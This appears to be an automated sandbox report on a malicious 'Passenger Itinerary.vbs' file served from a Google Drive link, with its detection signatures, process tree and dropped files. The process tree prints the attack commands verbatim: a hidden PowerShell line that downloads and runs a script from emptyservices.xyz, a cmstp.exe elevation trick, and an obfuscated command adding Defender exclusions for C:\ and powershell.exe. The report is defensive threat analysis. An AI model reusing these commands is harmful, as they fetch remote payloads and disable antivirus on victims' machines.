Analysis

  • max time kernel
    58s
  • max time network
    58s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
  • submitted
    26-11-2024 19:08

General

  • Target

    https://drive.google.com/open?id=1uBKuZ8MdOSwUgl8qiQAAGvyswRZqIu92

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Drops file in System32 directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://drive.google.com/open?id=1uBKuZ8MdOSwUgl8qiQAAGvyswRZqIu92
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3412
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0x84,0x104,0x7ffe262ecc40,0x7ffe262ecc4c,0x7ffe262ecc58
      2⤵
        PID:2084
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1888,i,11099992666633818551,5622260924773616699,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1884 /prefetch:2
        2⤵
          PID:4168
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2132,i,11099992666633818551,5622260924773616699,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2188 /prefetch:3
          2⤵
            PID:1600
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2248,i,11099992666633818551,5622260924773616699,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2256 /prefetch:8
            2⤵
              PID:1400
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,11099992666633818551,5622260924773616699,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3136 /prefetch:1
              2⤵
                PID:1940
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3132,i,11099992666633818551,5622260924773616699,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3300 /prefetch:1
                2⤵
                  PID:2340
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4520,i,11099992666633818551,5622260924773616699,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4524 /prefetch:1
                  2⤵
                    PID:2496
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4888,i,11099992666633818551,5622260924773616699,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4908 /prefetch:1
                    2⤵
                      PID:3988
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4884,i,11099992666633818551,5622260924773616699,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5152 /prefetch:8
                      2⤵
                        PID:3688
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5148,i,11099992666633818551,5622260924773616699,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5412 /prefetch:8
                        2⤵
                          PID:2372
                        • C:\Windows\System32\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\Passenger Itinerary.vbs"
                          2⤵
                          • Checks computer location settings
                          PID:1812
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
                            3⤵
                            • Blocklisted process makes network request
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4164
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -encodedCommand [Base64-encoded command omitted] -inputFormat xml -outputFormat text
                              4⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2992
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\byewnwba\byewnwba.cmdline"
                                5⤵
                                  PID:2728
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF4EF.tmp" "c:\Users\Admin\AppData\Local\Temp\byewnwba\CSCBD104D52795439298FD9C6C17D11038.TMP"
                                    6⤵
                                      PID:2364
                                  • C:\windows\system32\cmstp.exe
                                    "C:\windows\system32\cmstp.exe" /au C:\windows\temp\jsb3ci3v.inf
                                    5⤵
                                      PID:4684
                            • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                              "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                              1⤵
                                PID:2552
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                1⤵
                                  PID:3220
                                • C:\Windows\System32\rundll32.exe
                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                  1⤵
                                    PID:3712
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath 'C:\'; .('Add-MpP' + 'reference') -ExclusionProcess 'powershell.exe'
                                    1⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Drops file in System32 directory
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:5004
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /IM cmstp.exe /F
                                    1⤵
                                    • Kills process with taskkill
                                    PID:2668
                                  • C:\Windows\System32\WScript.exe
                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\Passenger Itinerary.vbs"
                                    1⤵
                                    • Checks computer location settings
                                    PID:808
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
                                      2⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:4220
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -encodedCommand <Base64-encoded command omitted> -inputFormat xml -outputFormat text
                                        3⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:1464
                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\afs4ya1k\afs4ya1k.cmdline"
                                          4⤵
                                            PID:3320
                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2AC4.tmp" "c:\Users\Admin\AppData\Local\Temp\afs4ya1k\CSCCD6D63AEAC224EDEADAE592AB927829A.TMP"
                                              5⤵
                                                PID:4952
                                            • C:\windows\system32\cmstp.exe
                                              "C:\windows\system32\cmstp.exe" /au C:\windows\temp\4zryum0t.inf
                                              4⤵
                                                PID:3512
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath 'C:\'; .('Add-MpP' + 'reference') -ExclusionProcess 'powershell.exe'
                                          1⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Drops file in System32 directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:4048
                                        • C:\Windows\system32\taskkill.exe
                                          taskkill /IM cmstp.exe /F
                                          1⤵
                                          • Kills process with taskkill
                                          PID:3032

                                        Network

                                        MITRE ATT&CK Enterprise v15

                                        Downloads

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\88fbe54b-94e1-48ae-92f2-5143f7bd019f.tmp

                                          Filesize

                                          10KB

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                          Filesize

                                          649B

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                          Filesize

                                          384B

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                          Filesize

                                          2B

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                          Filesize

                                          859B

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          10KB

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          10KB

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                          Filesize

                                          116KB

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                          Filesize

                                          116KB

                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                          Filesize

                                          2KB

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          1KB

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          1KB

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          1KB

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          1KB

                                        • C:\Users\Admin\AppData\Local\Temp\RES2AC4.tmp

                                          Filesize

                                          1KB

                                        • C:\Users\Admin\AppData\Local\Temp\RESF4EF.tmp

                                          Filesize

                                          1KB

                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_osx4p10o.p2g.ps1

                                          Filesize

                                          60B

                                        • C:\Users\Admin\AppData\Local\Temp\afs4ya1k\afs4ya1k.dll

                                          Filesize

                                          4KB

                                        • C:\Users\Admin\AppData\Local\Temp\byewnwba\byewnwba.dll

                                          Filesize

                                          4KB

                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                          Filesize

                                          6KB

                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                          Filesize

                                          6KB

                                        • C:\Users\Admin\Downloads\Unconfirmed 254778.crdownload

                                          Filesize

                                          78KB

                                        • C:\windows\temp\jsb3ci3v.inf

                                          Filesize

                                          687B

                                        • \??\c:\Users\Admin\AppData\Local\Temp\afs4ya1k\CSCCD6D63AEAC224EDEADAE592AB927829A.TMP

                                          Filesize

                                          652B

                                        • \??\c:\Users\Admin\AppData\Local\Temp\afs4ya1k\afs4ya1k.cmdline

                                          Filesize

                                          369B

                                        • \??\c:\Users\Admin\AppData\Local\Temp\byewnwba\CSCBD104D52795439298FD9C6C17D11038.TMP

                                          Filesize

                                          652B

                                        • \??\c:\Users\Admin\AppData\Local\Temp\byewnwba\byewnwba.0.cs

                                          Filesize

                                          2KB

                                        • \??\c:\Users\Admin\AppData\Local\Temp\byewnwba\byewnwba.cmdline

                                          Filesize

                                          369B

                                        • memory/1464-214-0x00000270DFB10000-0x00000270DFB18000-memory.dmp

                                          Filesize

                                          32KB

                                        • memory/2992-127-0x0000023C7EB20000-0x0000023C7EB3C000-memory.dmp

                                          Filesize

                                          112KB

                                        • memory/2992-140-0x0000023C7EB40000-0x0000023C7EB48000-memory.dmp

                                          Filesize

                                          32KB

                                        • memory/4164-117-0x00007FFE13620000-0x00007FFE140E1000-memory.dmp

                                          Filesize

                                          10.8MB

                                        • memory/4164-116-0x00007FFE13620000-0x00007FFE140E1000-memory.dmp

                                          Filesize

                                          10.8MB

                                        • memory/4164-167-0x00007FFE13620000-0x00007FFE140E1000-memory.dmp

                                          Filesize

                                          10.8MB

                                        • memory/4164-166-0x00007FFE13623000-0x00007FFE13625000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/4164-106-0x0000021E746A0000-0x0000021E746C2000-memory.dmp

                                          Filesize

                                          136KB

                                        • memory/4164-105-0x00007FFE13623000-0x00007FFE13625000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/4164-182-0x00007FFE13620000-0x00007FFE140E1000-memory.dmp

                                          Filesize

                                          10.8MB